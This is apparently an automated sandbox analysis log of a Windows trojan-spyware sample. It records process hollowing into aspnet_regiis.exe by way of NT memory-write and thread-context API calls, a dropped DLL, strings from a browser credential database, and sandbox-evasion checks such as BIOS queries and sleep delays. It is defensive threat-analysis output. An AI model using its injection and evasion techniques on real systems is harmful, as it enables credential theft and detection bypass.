            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknownHTTPS traffic detected: 172.67.223.140:443 -> 192.168.2.4:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.223.140:443 -> 192.168.2.4:49732 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.223.140:443 -> 192.168.2.4:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.223.140:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.223.140:443 -> 192.168.2.4:49739 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.223.140:443 -> 192.168.2.4:49741 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.223.140:443 -> 192.168.2.4:49742 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.223.140:443 -> 192.168.2.4:49744 version: TLS 1.2

            System Summary

            barindex
            Source: file.exeStatic PE information: section name: W{2/c
            Source: file.exeStatic PE information: section name:
            Source: C:\Users\user\Desktop\file.exeMemory allocated: 72AC0000 page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CD936C0 WindowsHandle,GetConsoleWindow,ShowWindow,VirtualAlloc,CreateProcessW,NtGetContextThread,NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtReadVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtCreateThreadEx,NtSetContextThread,NtResumeThread,CloseHandle,CloseHandle,GetConsoleWindow,ShowWindow,0_2_6CD936C0
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CD92E60 GetModuleHandleW,NtQueryInformationProcess,0_2_6CD92E60
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00630A700_2_00630A70
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062BC100_2_0062BC10
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006182B00_2_006182B0
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006180900_2_00618090
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006155700_2_00615570
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00629F200_2_00629F20
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006333200_2_00633320
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006301F00_2_006301F0
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006175A00_2_006175A0
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CD936C00_2_6CD936C0
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CD92E600_2_6CD92E60
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CD912000_2_6CD91200
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CD934700_2_6CD93470
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CDA03C10_2_6CDA03C1
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CD927900_2_6CD92790
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CD963700_2_6CD96370
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7132 -s 1224
            Source: file.exe, 00000000.00000000.1672730785.0000000000666000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameUlyssesTessaSamuel.rYPIT vs file.exe
            Source: file.exe, 00000000.00000002.2350943635.0000000000BEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
            Source: file.exeBinary or memory string: OriginalFilenameUlyssesTessaSamuel.rYPIT vs file.exe
            Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: file.exeStatic PE information: Section: W{2/c ZLIB complexity 1.0003205224328215
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/7@1/1
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\gdi32.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeMutant created: NULL
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7132
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5260:120:WilError_03
            Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\a79b116a-e7ff-4340-912e-17ecac6aa1baJump to behavior
            Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
            Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: aspnet_regiis.exe, 00000002.00000003.1726325297.0000000004F96000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1749351821.0000000004F79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: file.exeReversingLabs: Detection: 26%
            Source: file.exeString found in binary or memory: -addpset
            Source: file.exeString found in binary or memory: -addfulltrust
            Source: file.exeString found in binary or memory: -addgroup
            Source: file.exeString found in binary or memory: -help
            Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7132 -s 1224
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"Jump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: %%.pdb source: file.exe, 00000000.00000002.2350885780.0000000000AFA000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdb source: file.exe, 00000000.00000002.2350943635.0000000000C99000.00000004.00000020.00020000.00000000.sdmp, WER4C58.tmp.dmp.5.dr
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: file.exe, 00000000.00000002.2350943635.0000000000C4A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: file.exe, 00000000.00000002.2350943635.0000000000C4A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Desktop\file.PDB source: file.exe, 00000000.00000002.2350885780.0000000000AFA000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Users\user\Desktop\file.PDB source: file.exe, 00000000.00000002.2350943635.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.ni.pdb source: WER4C58.tmp.dmp.5.dr
            Source: Binary string: n0C:\Windows\mscorlib.pdb source: file.exe, 00000000.00000002.2350885780.0000000000AFA000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\mscorlib.pdb source: file.exe, 00000000.00000002.2350943635.0000000000C4A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.ni.pdbRSDS source: WER4C58.tmp.dmp.5.dr

            Data Obfuscation

            barindex
            Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.5e0000.0.unpack W{2/c:EW;.text:ER;.rsrc:R;.reloc:R;Unknown_Section4:ER; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:R;Unknown_Section4:ER;
            Source: file.exeStatic PE information: section name: W{2/c
            Source: file.exeStatic PE information: section name:
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005E264D push ebx; retf 0_2_005E2651
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005E564D push ds; retf 0_2_005E56BA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005E5468 push B7E5E5E6h; ret 0_2_005E54CF
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005E57C2 pushad ; retf 0_2_005E5887
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005E27A3 push ss; iretd 0_2_005E27AA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_3_02C91FBD push esi; retf 2_3_02C91FC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_3_02C91FBD push esi; retf 2_3_02C91FC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_3_02C91FBD push esi; retf 2_3_02C91FC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_3_02C91FBD push esi; retf 2_3_02C91FC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_3_02C91B3F push FFFFFFDBh; iretd 2_3_02C91B50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_3_02C91B3F push FFFFFFDBh; iretd 2_3_02C91B50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_3_02C91B3F push FFFFFFDBh; iretd 2_3_02C91B50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_3_02C91B3F push FFFFFFDBh; iretd 2_3_02C91B50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_3_02C91FBD push esi; retf 2_3_02C91FC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_3_02C91FBD push esi; retf 2_3_02C91FC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_3_02C91FBD push esi; retf 2_3_02C91FC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_3_02C91FBD push esi; retf 2_3_02C91FC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_3_02C91B3F push FFFFFFDBh; iretd 2_3_02C91B50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_3_02C91B3F push FFFFFFDBh; iretd 2_3_02C91B50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_3_02C91B3F push FFFFFFDBh; iretd 2_3_02C91B50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_3_02C91B3F push FFFFFFDBh; iretd 2_3_02C91B50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_3_02C91FBD push esi; retf 2_3_02C91FC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_3_02C91FBD push esi; retf 2_3_02C91FC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_3_02C91FBD push esi; retf 2_3_02C91FC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_3_02C91FBD push esi; retf 2_3_02C91FC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_3_02C91B3F push FFFFFFDBh; iretd 2_3_02C91B50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_3_02C91B3F push FFFFFFDBh; iretd 2_3_02C91B50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_3_02C91B3F push FFFFFFDBh; iretd 2_3_02C91B50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_3_02C91B3F push FFFFFFDBh; iretd 2_3_02C91B50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_3_02C91FBD push esi; retf 2_3_02C91FC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_3_02C91FBD push esi; retf 2_3_02C91FC0
            Source: file.exeStatic PE information: section name: W{2/c entropy: 7.999654523046763
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\gdi32.dllJump to dropped file
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: Yara matchFile source: Process Memory Space: file.exe PID: 7132, type: MEMORYSTR
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSystem information queried: FirmwareTableInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeMemory allocated: 28A0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\file.exeMemory allocated: 2AB0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\file.exeMemory allocated: 2920000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\file.exeMemory allocated: 50F0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\file.exeMemory allocated: 60F0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\file.exeMemory allocated: 6220000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\file.exeMemory allocated: 7220000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\file.exeMemory allocated: 7570000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\file.exeMemory allocated: 8570000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\file.exeMemory allocated: 9570000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\file.exe TID: 1188Thread sleep time: -55000s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe TID: 3752Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Users\user\Desktop\file.exeLast function: Thread delayed
